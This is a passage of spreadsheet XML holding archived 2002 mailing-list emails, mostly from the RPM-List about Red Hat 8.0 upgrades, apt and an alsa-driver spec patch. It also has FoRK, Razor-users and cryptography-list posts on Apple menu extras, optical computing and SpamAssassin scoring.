so I look at my backup and make the same change again. The only thing where you can get stuck is the grub.conf files, because although there's a /etc/grub.conf link, it's actually in /boot/grub/ so you may want to copy it too if you have special kernel parameters to save (I have to pass "pci=bios,biosirq" for one of my computers to work for example). HTH, Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Wed, 2 Oct 2002 18:37:28 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 18:37:28 -0400 (EDT)</t>
  </si>
  <si>
    <t>Apple Sauced...again</t>
  </si>
  <si>
    <t>Over on Arstechnica ([URL]www.arstechnica.com[/URL] I saw mention of a Wired article\nthat goes into the many wonderfull ways Apple is showing its love and\nrespect for its users.\n\n[URL]http://www.wired.com[/URL],2125,55395,00.html\n\nThere is a good rundown of all the whys and whatfores over at\n[URL]http://arstechnica.com[/URL]\n\n"True to form, industrious third party developers saw that they could gain\na competitive advantage by supporting this more capable user interface in\ntheir applications. Apple's private menu extras APIs were reverse\nengineered and leveraged to great effect. The architecture was so popular\nthat an application for managing predefined sets of menu extras (third\nparty or otherwise) was in development.\n\nAll of that changed with the release of Jaguar--but not because the\nprivate APIs had changed. If they had, third party developers would have\nupdated their applications to work with the new APIs, as they have\nresigned themselves to doing by choosing to use private APIs in the first\nplace.\n\nBut what actually happened in Jaguar was that Apple added code to forcibly\nexclude all non-Apple menu extras. Other parts of the API did not change.\nBut when a menu extra is loaded, it is compared to a hard-coded list of\n"known" menu extras from Apple. If the menu extra is not on that list, it\nis not allowed to load.\n\nIt's easy to laugh at Steve Ballmer's sweat-soaked gyrations as he chants\n"developers, developers, developers!", but Microsoft clearly understands\nsomething that Apple is still struggling with. It is in a platform\nvendor's best interest to encourage development for its platform. In\nApple's case, this doesn't mean that they have to bend over backwards to\nmake every single system service and UI element "pluggable" via public\nAPIs. That's clearly a lot of work, and not something that needs to be the\nnumber one priority for an OS in its infancy. And in the meantime, if\nthird party developers want to sell into a market that requires the\ndesired functionality to be added in "unsupported" ways, then they must be\nprepared for the maintenance consequences of their decisions.\n\nBut for Apple to go out of its way--to actually expend developer\neffort--to stop these third party developers, while still failing to\nprovide a supported alternative, is incredibly foolish. "</t>
  </si>
  <si>
    <t>www.arstechnica.com http://www.wired.com http://arstechnica.com</t>
  </si>
  <si>
    <t>To: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Wed, 2 Oct 2002 16:25:26 -0400</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 16:25:26 -0400</t>
  </si>
  <si>
    <t>Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, fork@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Re: Optical analog computing?</t>
  </si>
  <si>
    <t>--- begin forwarded text Date: Thu, 03 Oct 2002 03:21:05 +1000 To: "John S. Denker"  From: Greg Rose  Subject: Re: Optical analog computing? Cc: "R. A. Hettinga" ,    Digital Bearer Settlement List ,    cryptography@wasabisystems.com At 01:30 AM 10/2/2002 -0400, John S. Denker wrote: &gt;"R. A. Hettinga" wrote: &gt;... &gt; &gt; "the first computer to crack enigma was optical" &gt;1) Bletchley Park used optical sensors, which were (and &gt;still are) the best way to read paper tape at high speed. &gt;You can read about it in the standard accounts, e.g. &gt;   [URL]http://www.picotech.com[/URL] But Colossus was not for Enigma. The bombes used for Enigma were electro-mechanical. I'm not aware of any application of optical techniques to Enigma, unless they were done in the US and are still classified. And clearly, the first bulk breaks of Enigma were done by the bombes, so I guess it depends whether you count bombes as computers or not, whether this statement has any credibility at all. Greg. Williams/Zenon 2004 campaign page: [URL]http://www.ben4prez.org[/URL] Greg Rose                                       INTERNET: ggr@qualcomm.com Qualcomm Australia          VOICE:  +61-2-9817 4188   FAX: +61-2-9817 5199 Level 3, 230 Victoria Road,                [URL]http://people.qualcomm.com[/URL] Gladesville NSW 2111    232B EC8F 44C6 C853 D68F  E107 E6BF CD2F 1081 A37C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www.picotech.com http://www.ben4prez.org http://people.qualcomm.com</t>
  </si>
  <si>
    <t>To: apt-rpm@distro.conectiva.com.br, &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: Panu Matilainen &lt;pmatilai@welho.com&gt;\nDate: Wed, 2 Oct 2002 12:39:34 +0300 (EEST)</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 12:39:34 +0300 (EEST)</t>
  </si>
  <si>
    <t>Panu Matilainen &lt;pmatilai@welho.com&gt;</t>
  </si>
  <si>
    <t>apt-rpm@distro.conectiva.com.br, &lt;rpm-zzzlist@freshrpms.net&gt;</t>
  </si>
  <si>
    <t>Debian-style task-packages for RH8.0 available</t>
  </si>
  <si>
    <t>Hi, This has been hashed over a few times on various lists, now I finally got  around to doing something about it... You can now add "rpm [URL]http://koti.welho.com[/URL] redhat/8.0 task" to your sources.list  and after apt-get update you can find out what's available with  'apt-cache search ^task-' These are generated directly from comps.xml of RH8.0 so they contain  exactly the same packages as you'll get by choosing the various categories  at install time. I didn't bother including SRPMS for these as they are  rather uninteresting, if you want you can re-generate the .specs by  running [URL]http://koti.welho.com[/URL] BTW the repository only contains the task-packages, you'll need an  apt-enabled mirror of RH8.0 in your sources.list to actually do anything  with it. --  	- Panu - _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://koti.welho.com http://koti.welho.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Gary Peck &lt;gbpeck@sbcglobal.net&gt;\nDate: Wed, 2 Oct 2002 12:36:02 -0700</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 12:36:02 -0700</t>
  </si>
  <si>
    <t>Gary Peck &lt;gbpeck@sbcglobal.net&gt;</t>
  </si>
  <si>
    <t>--RnlQjJ0d97Da+TV1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, Oct 02, 2002 at 10:09:19AM +0200, Matthias Saou wrote: &gt; Well, I don't really find it consistent at all to use an rpm package built &gt; against something that wasn't installed through rpm :-/ Following that reasoning, I've been installing all my custom-built kernels through rpm recently. I find it annoying, though, that  alsa-kernel, and similar packages, will only build for the currently  running kernel. So I've attached a patch to specify an alternate kernel by setting the "TARGET_KERNEL" environment variable before running rpmbuild. You still need to have the rpm for the specified kernel installed, but at least it doesn't have to be currently running. It's kinda hackish, so if someone has a better way to do this, let me know. gary --RnlQjJ0d97Da+TV1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline; filename="alsa-driver-spec.patch" --- alsa-driver.spec.orig	2002-10-02 12:25:26.000000000 -0700 +++ alsa-driver.spec	2002-10-01 21:23:19.000000000 -0700 @@ -3,9 +3,12 @@  # Comma separated list of cards for which to compile a driver  %define	cards		all   -%define	kunamer		%(uname -r) -%define	kversion	%(echo $(uname -r) | sed -e s/smp// -) -%if %(uname -r | grep -c smp) +%if %(printenv TARGET_KERNEL &gt;/dev/null &amp;&amp; echo -n 1 || echo -n 0) +%define usekernel	%(echo -n $TARGET_KERNEL) +%endif +%define	kunamer		%{!?usekernel: %(uname -r)}%{?usekernel} +%define	kversion	%(echo %{kunamer} | sed -e s/smp// -) +%if %(echo %{kunamer} | grep -c smp)  	%{expand:%%define ksmp -smp}  %endif  %define	karch		%(rpm -q --qf '%%{arch}' kernel%{?ksmp}-%{kversion}) @@ -77,6 +80,7 @@  	%{?_without_isapnp:--with-isapnp=no} \  	%{?_without_sequencer:--with-sequencer=no} \  	%{?_without_oss:--with-oss=no} \ +	%{?usekernel:--with-kernel=/lib/modules/%{usekernel}/build} \  	--with-cards=%{cards}  make   @@ -106,10 +109,10 @@  rm -f %{buildroot}/etc/rc.d/init.d/alsasound    %post -n alsa-kernel%{?ksmp} -/sbin/depmod -a +/sbin/depmod -a -F /boot/System.map-%{kunamer} %{kunamer}    %postun -n alsa-kernel%{?ksmp} -/sbin/depmod -a +/sbin/depmod -a -F /boot/System.map-%{kunamer} %{kunamer}    %clean  rm -rf %{buildroot} --RnlQjJ0d97Da+TV1-- _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Wed, 2 Oct 2002 11:45:33 +0200</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 11:45:33 +0200</t>
  </si>
  <si>
    <t>freshrpms.net resources (was Re: use new apt to do null to RH8</t>
  </si>
  <si>
    <t>Once upon a time, Brian wrote : &gt;    Yeah, but I try to 'take it easy' on your server.  The golden rule of &gt;    the internet: when you find a free resource, don't piss'em off!  :)  I &gt;    really appreciate your work; you get done the things I wish I could, &gt;    and I respect that. Don't worry too much : The day the server gets too busy, I'll cleanup and publish the addresses of some mirrors, as many ftp mirrors exist (I'm aware of at least 15), and even an apt one :-) For now, the limit is far enough : When I unlocked the Psyche ISO images on Monday, the bandwidth usage on the current (ftp|http|rsync) freshrpms.net server went up to 90Mbps sustained, which is not bad as the server has a 100Mbps physical NIC! Of course, I'd get in trouble if it was always like that, but the average used when no new Red Hat release is there is between 2 and 4Mbps, which my company tolerates, as I've convinced them it's a useful return to the community providing us the great operating system all our servers are running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Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Wed, 2 Oct 2002 10:53:24 +0200</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 10:53:24 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Brian wrote : &gt;     Yeah, I need to work this out, too; I just learned my lesson about &gt;     living on the bleeding edge. Lesson learned?  NO MORE XIMIAN, UNDER &gt;     ANY CIRCUMSTANCES.  Man, that was annoying. We all learned that sooner or later, right? When I got down to that myself is when I started redhat.aldil.org, now known as freshrpms.net ;-) &gt;     Anyway, I have returned to Redhat 7.3 on my root filesystem (saved my &gt;     home directories, music and games on other partitions) and while I &gt;     have the 8.0 stuff in the list, everything I want to upgrade requires &gt;     200+ RPMs. &gt;  &gt;     I'm not opposed to this, but apt is.  "apt-get dist-upgrade" dumps &gt;     core. Strange. Anyway, although I'd easily recommend upgrading 7.x to 7.3 using apt, I wouldn't for 7.x to 8.0 as they are C++ binary incompatible... and apt is entirely written in C++ and dynamically linked :-/ Still, that doesn't explain a core dump :-( &gt;     What's the inside secret here, or do I just start searching mirrors &gt;     for the ISO and get over it? Why "search"? There's more than enough to choose from here : [URL]http://freshrpms.net[/URL] Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Wed, 2 Oct 2002 10:37:02 -0400</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 10:37:02 -0400</t>
  </si>
  <si>
    <t>--- begin forwarded text Date: Wed, 02 Oct 2002 01:30:24 -0400 From: "John S. Denker"  Subject: Re: Optical analog computing? Sender: jsd@no.domain.spam To: "R. A. Hettinga"  Cc: Digital Bearer Settlement List ,  cryptography@wasabisystems.com "R. A. Hettinga" wrote: ... &gt; "the first computer to crack enigma was optical" &gt; "the first synthetic-aperture-radar processor was optical" &gt; "but all these early successes were classified -- 100 to 200 projects, &gt; and I probably know of less than half." &gt; &gt; --&gt; Do these claims compute?! is this really a secret history, or does &gt; this mean holography, of am I just completely out of the loop?1 Gimme a break.  This is remarkable for its lack of newsworthiness. 1) Bletchley Park used optical sensors, which were (and still are) the best way to read paper tape at high speed. You can read about it in the standard accounts, e.g.   [URL]http://www.picotech.com[/URL] 2) For decades before that, codebreakers were using optical computing in the form of superposed masks to find patterns. You can read about it in Kahn. 3) People have been doing opto-electronic computing for decades.  There's a lot more to it than just holography. I get 14,000 hits from   [URL]http://www.google.com[/URL] &gt; Optical info is a complex-valued wave (spatial frequency, amplitude and &gt; phase) It isn't right to make it sound like three numbers (frequency, amplitude, and phase);  actually there are innumerable frequencies, each of which has its own amplitude and phase. &gt; lenses, refractions, and interference are the computational operators. &gt; (add, copy, multiply, fft, correlation, convolution) of 1D and 2D arrays &gt; &gt; and, of course, massively parallel by default. &gt; &gt; and, of course, allows free-space interconnects. Some things that are hard with wires are easy with light-waves.  But most things that are easy with wires are hard with light-waves. &gt; Here's a commercialized effort from israel: a "space integrating &gt; vector-matric multiplier"  [ A ] B = [ C ] &gt; laser-&gt; 512-gate modulator -&gt; spread over 2D &gt; "256 Teraflop equivalent" for one multiply per nanosecond. People were doing smaller versions of that in the 1980s. &gt; Unclassified example: acousto-optic spectrometer, 500 Gflops equivalent &gt; (for 12 watts!) doing continuous FFTs.  Launched in 1998 on a 2-year &gt; mission. Submillimeter wave observatory. Not "FFTs".  FTs.  Fourier Transforms.  All you need for taking a D=2 Fourier Transform is a lens.  It's undergrad physics-lab stuff.  I get 6,000 hits from:   [URL]http://www.google.com[/URL] &gt; Of course, the rest of the talk is about the promise of moving from &gt; optoelectronic to all-optical processors (on all-optical nets &amp; with &gt; optical encryption, &amp; so on). All optical???  No optoelectronics anywhere??? That's medicinal-grade pure snake oil, USP. Photons are well known for not interacting with each other.  It's hard to do computing without interactions.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www.picotech.com http://www.google.com http://www.google.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Wed, 2 Oct 2002 10:09:19 +0200</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 10:09:19 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Ben wrote : &gt; I use a mostly Red Hat 8.0 system, but prefer to configure and build my  &gt; kernel by hand.  I'd like to humbly offer a tweak to alsa-driver.spec  &gt; that helps it build cleanly under such circumstances.  I recognize that  &gt; freshrpms.net packages are designed with standard Red Hat in mind,  &gt; including a standard kernel RPM.  However, I hope that Matthias will  &gt; consider the tweak small enough to justify its incorporation. Well, I don't really find it consistent at all to use an rpm package built against something that wasn't installed through rpm :-/ What I'd recommend in your case : You should keep at least one original Red Hat Linux kernel (you do just in case, right? ;-)) and install the matching alsa-kernel package as you'll need at least one because of the dependencies. Then for your custom built kernel, simply "./configure --with-cards=all &amp;&amp; make &amp;&amp; make install DESTDIR=/tmp/alsa-driver" from the alsa-driver sources then as root copy all the modules under /tmp/alsa-driver/lib/modules/ to your modules dir and run "depmod -a". Of course you can even make it much faster by not compiling all un-needed drivers, as I guess that's one of the reasons one would rebuild his own kernel. I find this the easiest and cleanest way to get around the problem. It's what I've done and what I'll keep doing on my laptop where I'm running a kernel recompiled with ACPI. Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.00 0.02 0.00 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Thomas Vander Stichele &lt;thomas@urgent.rug.ac.be&gt;\nDate: Wed, 2 Oct 2002 09:44:15 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 09:44:15 +0200 (CEST)</t>
  </si>
  <si>
    <t>Thomas Vander Stichele &lt;thomas@urgent.rug.ac.be&gt;</t>
  </si>
  <si>
    <t>&gt; Matthias Saou (matthias@egwn.net) wrote*: &gt; &gt;As Red Hat does, I really don't recommend trying to upgrade between betas &gt; &gt;or from a beta to a final release either. Simply backup your /home, /etc &gt; &gt;(and /root and/or /usr/local/ if needed) then reinstall cleanly, it'll &gt; &gt;probably save a few hassles and you'll get the cleanest possible system ;-) &gt;  &gt; I think this is probably the best way, because I think (maybe) with upgrading you &gt; do not always automatically get the latest feature enabled in some config file &gt; because RH would rather take it easy and not update that config file (you get a &gt; rpmnew instead of rpmsaved file) so they get less calls to support that way. If you dislike Red Hat, why use it ? This was a really bad argument  against using Red Hat that makes no sense at all.  I for one am GLAD that  they  a) don't overwrite your config files on a whim (be GLAD they don't do some  sort of autodetection and changing crap) b) tell you on rpm upgrade what config files you should look at because  formats have changed. Red Hat is not "taking it easy" on this, it's putting control in the hands  of you, the maintainer of the machine.  Don't be lazy. &gt; Anyway, I have tons of media files in /home/* probably 5 to 10 gigs at least, my &gt; laptop's CDROM takes 700MB at a time (obviously) and compressing media files is &gt; dumb because they are already compressed. Dumb question: how to backup huge data? &gt; Network backup to another box? I do not have a box with a tape drive, but maybe box &gt; with a large HD with much free space could take the backup (oops, I do not have a &gt; space computer with a large HD with much free space). You don't need to backup /home if you are careful enough.  You did put  /home on a separate partition, no ? Just install rh80 and tell it to use  the same partition as /home and tell it to NOT format it, but keep the  data as is. If you didn't put /home on a separate partition, then you really do need  to make backups.  Use an nfs or smb mount from another machine to backup  and rsync straight to the mount, or if that's not possible, rsync over  ssh.  It's the best way to make backups. &gt; These media files are backed up - ON THE CD'S THEY CAME FROM!  It's the other way around - your media files are backups of the CD's they  came from ;) Good luck, Thomas --  The Dave/Dina Project : future TV today ! - [URL]http://davedina.apestaart.org[/URL] &lt;-*-                      -*-&gt; You know the shape my breath will take before I let it out &lt;-*- thomas@apestaart.org -*-&gt; URGent, the best radio on the Internet - 24/7 ! - [URL]http://urgent.rug.ac.be[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://davedina.apestaart.org http://urgent.rug.ac.be http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Wed, 2 Oct 2002 04:18:52 -0500</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 04:18:52 -0500</t>
  </si>
  <si>
    <t>On Wed, 2 Oct 2002 10:53:24 +0200, Matthias Saou  wrote: &gt; &gt;     Anyway, I have returned to Redhat 7.3 on my root filesystem (saved my &gt; &gt;     home directories, music and games on other partitions) and while I &gt; &gt;     have the 8.0 stuff in the list, everything I want to upgrade requires &gt; &gt;     200+ RPMs.    Yeah, but I try to 'take it easy' on your server.  The golden rule of the internet: when you find a free resource, don't piss'em off!  :)  I really appreciate your work; you get done the things I wish I could, and I respect that. &gt; Anyway, although I'd easily recommend upgrading 7.x to 7.3 using apt, I &gt; wouldn't for 7.x to 8.0 as they are C++ binary incompatible... and apt is &gt; entirely written in C++ and dynamically linked :-/     OK, I'll search for the ISOs on the  one remaining site that isn't hammered.  :)   &gt; Still, that doesn't explain a core dump :-(     Sure: this is a linking issue, right?  Right now I'm still pure-vanilla.  I have the stock version of rpm/rpmlib/popt/etc and the recommended version of apt that you gave me.  No, wait...there's no new code getting loaded.  I don't know, either.  It's been a long day. &gt; &gt;     What's the inside secret here, or do I just start searching mirrors &gt; &gt;     for the ISO and get over it? &gt;  &gt; Why "search"? There's more than enough to choose from here : &gt; [URL]http://freshrpms.net[/URL]    The hunt continues- with a new field!  (Actually I checked there yesterday, but it's worth another shot.)     Thanks!    ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ Just machines, to make big decisions- programmed by fellas with compassion and vision.  We'll be clean when that work is done; Eternally free and eternally young.  Linux. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://freshrpms.net http://www.CounterMoon.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Wed, 2 Oct 2002 03:00:39 -0500</t>
  </si>
  <si>
    <t>Wed, 2 Oct 2002 03:00:39 -0500</t>
  </si>
  <si>
    <t>On Wed, 2 Oct 2002 09:44:15 +0200 (CEST), Thomas Vander Stichele  wrote: &gt; &gt; Matthias Saou (matthias@egwn.net) wrote*: &gt; &gt; &gt;As Red Hat does, I really don't recommend trying to upgrade between betas &gt; &gt; &gt;or from a beta to a final release either. Simply backup your /home, /etc &gt; &gt; &gt;(and /root and/or /usr/local/ if needed) then reinstall cleanly, it'll &gt; &gt; &gt;probably save a few hassles and you'll get the cleanest possible system ;-)     Yeah, I need to work this out, too; I just learned my lesson about living on the bleeding edge. Lesson learned?  NO MORE XIMIAN, UNDER ANY CIRCUMSTANCES.  Man, that was annoying.     Anyway, I have returned to Redhat 7.3 on my root filesystem (saved my home directories, music and games on other partitions) and while I have the 8.0 stuff in the list, everything I want to upgrade requires 200+ RPMs.     I'm not opposed to this, but apt is.  "apt-get dist-upgrade" dumps core.     What's the inside secret here, or do I just start searching mirrors for the ISO and get over it?    ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ Just machines, to make big decisions- programmed by fellas with compassion and vision.  We'll be clean when that work is done; Eternally free and eternally young.  Linux. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;, &lt;fork@spamassassin.taint.org&gt;\nFrom: Morbus Iff &lt;morbus@disobey.com&gt;\nDate: Wed, 18 Sep 2002 23:56:38 -0400</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 23:56:38 -0400</t>
  </si>
  <si>
    <t>Morbus Iff &lt;morbus@disobey.com&gt;</t>
  </si>
  <si>
    <t>"Mr. FoRK" &lt;fork_list@hotmail.com&gt;, &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Re: Oh ma gawd - funny site of the day...</t>
  </si>
  <si>
    <t>&gt;It seems good Ol' Uncle Dave is once again trying to savage anyone that &gt;dares to disagree with him.  It seems Ben, Kevin and Bill are making too &gt;strong a case.  So here we Dave's attempt to fool you into thinking they're &gt;some sort of monsters, violent ones no less. &gt; &gt;Anyone who works with Hemenway or Kearney should be aware that these people &gt;are nothing less than monsters, who will stoop to any level to get their /me coughs... I'm part of the Monster club. They call me... Hemenway!  --  Morbus Iff ( i assault your sensibilities! ) Culture: [URL]http://www.disobey.com[/URL] and [URL]http://www.gamegrene.com[/URL] Tech: [URL]http://www.oreillynet.com[/URL] - articles and weblog icq: 2927491 / aim: akaMorbus / yahoo: morbus_iff / jabber.org: morbus</t>
  </si>
  <si>
    <t>http://www.disobey.com http://www.gamegrene.com http://www.oreillynet.com</t>
  </si>
  <si>
    <t>To: "Razor User's List" &lt;razor-users@example.sourceforge.net&gt;\nFrom: bob@proulx.com (Bob Proulx)\nDate: Wed, 18 Sep 2002 23:21:40 -0600</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 23:21:40 -0600</t>
  </si>
  <si>
    <t>bob@proulx.com (Bob Proulx)</t>
  </si>
  <si>
    <t>"Razor User's List" &lt;razor-users@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] early experiences with Razor2 (and SA)</t>
  </si>
  <si>
    <t>--huq684BweRXVnRxX Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Gary Funck  [2002-09-18 13:57:00 -0700]: &gt; In my experience, there are spam messages that sneak past Spam Assassin, &gt; that Razor will pick up. Those are the ones that I'm calling "marginal". &gt; Basically, I'm hoping that "the collective" of Razor users make a better &gt; judge of spam than any single program like SA can, and therefore I can &gt; benefit from their judgement and get more extensive spam filtering. I've &gt; seen examples of this already, where SA doesn't score the spam high enough &gt; to bounce it, but Razor does. I think perhaps you missed the fact that SA scores are adjustable.  If you want SA to tag all messages listed in Razor then you can put this in your ~/.spamassassin/user_prefs file.   score RAZOR_CHECK 10 The default score is 3 and the default threshold needed is 5. Therefore if you wish to have any razor listed messages tagged by SA then setting a score for any razor listed messages to anything above 5 would be sufficient. If you are already using SA then the above would be more efficient. Otherwise you are running all of the mail through razor twice, once for SA and once again afterward.  If you really want to run Razor individually then you should set the 'score RAZOR_CHECK 0' so that SA won't do it and avoid the double network hit. However, one of the benefits of using SA in combination with Razor has been the history of false positive reports in the razor database.  The current score of 3 is hefty, but not enough by itself to tag as spam. But for any real spam is usually enough to push it over the threshold. Razor2 addresses the false positive problem but is not yet in as wide of use as Razor1. Bob --huq684BweRXVnRxX Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE9iV7k0pRcO8E2ULYRAjoAAJ97CB6LpbhPHqa8IJx1l4g/LRiVdwCfUZIB kUAK30zsRWL8PTb1TrEQuy8= =XVm6 -----END PGP SIGNATURE----- --huq684BweRXVnRxX-- ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: dcsb@ai.mit.edu, cryptography@wasabisystems.com, e$@vmeng.com,\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Wed, 18 Sep 2002 22:42:35 -0400</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 22:42:35 -0400</t>
  </si>
  <si>
    <t>dcsb@ai.mit.edu, cryptography@wasabisystems.com, e$@vmeng.com,</t>
  </si>
  <si>
    <t>[IRR] [dgc.chat] First public release of NeuDist Distributed</t>
  </si>
  <si>
    <t>--- begin forwarded text Subject: [dgc.chat] First public release of NeuDist Distributed Transaction Clearing	Framework From: Pelle Braendgaard  To: dgcchat@lists.goldmoney.com Cc: Digital Bearer Settlement List , DGCChat , xmlx  Date: 19 Sep 2002 00:05:39 -0500 Reply-To:  I'm happy to announce the first public release of NeuDist NeuDist is an Open Source Software framework for building applications for the Neubia Distributed Clearing Platform. This release contains early java libraries and documentation that would primarily be of interest to developers. Talking about documentation, it is still a bit slim and mainly oriented towards people with experience in Java/XML development. There are currently no sample applications, but they will be available in the next release. The framework currently contains the following: - Classes for creating "Named Objects", which are authenticated using digital signatures within a hierarchy. - Storage framework for "Named Objects". - Simple XML-Signature implementation (Almost certainly not yet interoperable with other implementations) - Simple SOAP client - Simple Servlet API for handling SOAP requests based on "Named   Objects". - Current types of "Named Objects" include:     NameSpace objects -- for maintaining the NameSpace Authentication  	Framework     AuthenticationTickets -- for doing web site authentication using 	digital signatures. Next major release is scheduled to contain:  - Core: 	hard coded root public key, for authenticating top level 	NameSpaces  - Signing Services: 	Implementation of web based signing services 	End user hosted signing service  - Example User Authentication Application  - Example Payment System based on NeuDist I will be expanding the documentation over the next few weeks. This will cover not only more indepth technical documentation, but also higher level documentation about the business side of things. Read more about NeuDist or download our early version at [URL]http://neudist.org[/URL] I would love to hear your questions and suggestions. To discuss it further please join neudist-discuss@lists.sourceforge.net You can join it at: [URL]http://lists.sourceforge.net[/URL] Regards Pelle --  Antilles Software Ventures SA 		[URL]http://neubia.com[/URL] My Web Log Live and Direct from Panama	[URL]http://talk.org[/URL] Views of an EconoFist			[URL]http://econofist.com[/URL] subscribe: send blank email to dgcchat-join@lists.goldmoney.com unsubscribe: send blank email to dgcchat-leave@lists.goldmoney.com digest: send an email to dgcchat-request@lists.goldmoney.com with "set yourname@yourdomain.com digest=on" in the message body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_______________________________________________ Irregulars mailing list Irregulars@tb.tf [URL]http://tb.tf[/URL]</t>
  </si>
  <si>
    <t>http://neudist.org http://lists.sourceforge.net http://neubia.com http://talk.org http://econofist.com http://tb.tf</t>
  </si>
  <si>
    <t>To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;,\nFrom: Udhay Shankar N &lt;udhay@pobox.com&gt;\nDate: Wed, 18 Sep 2002 22:10:35 +0530</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 22:10:35 +0530</t>
  </si>
  <si>
    <t>"R. A. Hettinga" &lt;rah@shipwright.com&gt;,</t>
  </si>
  <si>
    <t>Re: boycotting yahoo</t>
  </si>
  <si>
    <t>At 11:06 AM 9/18/02 -0400, R. A. Hettinga wrote: &gt;Dave Farber's Interesting People list just went over to &gt; It always was, I think. Meng Weng Wong, the founder of pobox, listbox et al  was a student of Dave Farber's. Listbox just upgraded its software, however. Udhay --  ((Udhay Shankar N)) ((udhay @ pobox.com)) (([URL]www.digeratus.com[/URL]</t>
  </si>
  <si>
    <t>www.digeratus.com</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;\nDate: Wed, 18 Sep 2002 20:44:08 -0700</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 20:44:08 -0700</t>
  </si>
  <si>
    <t>"Mr. FoRK" &lt;fork_list@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Oh ma gawd - funny site of the day...</t>
  </si>
  <si>
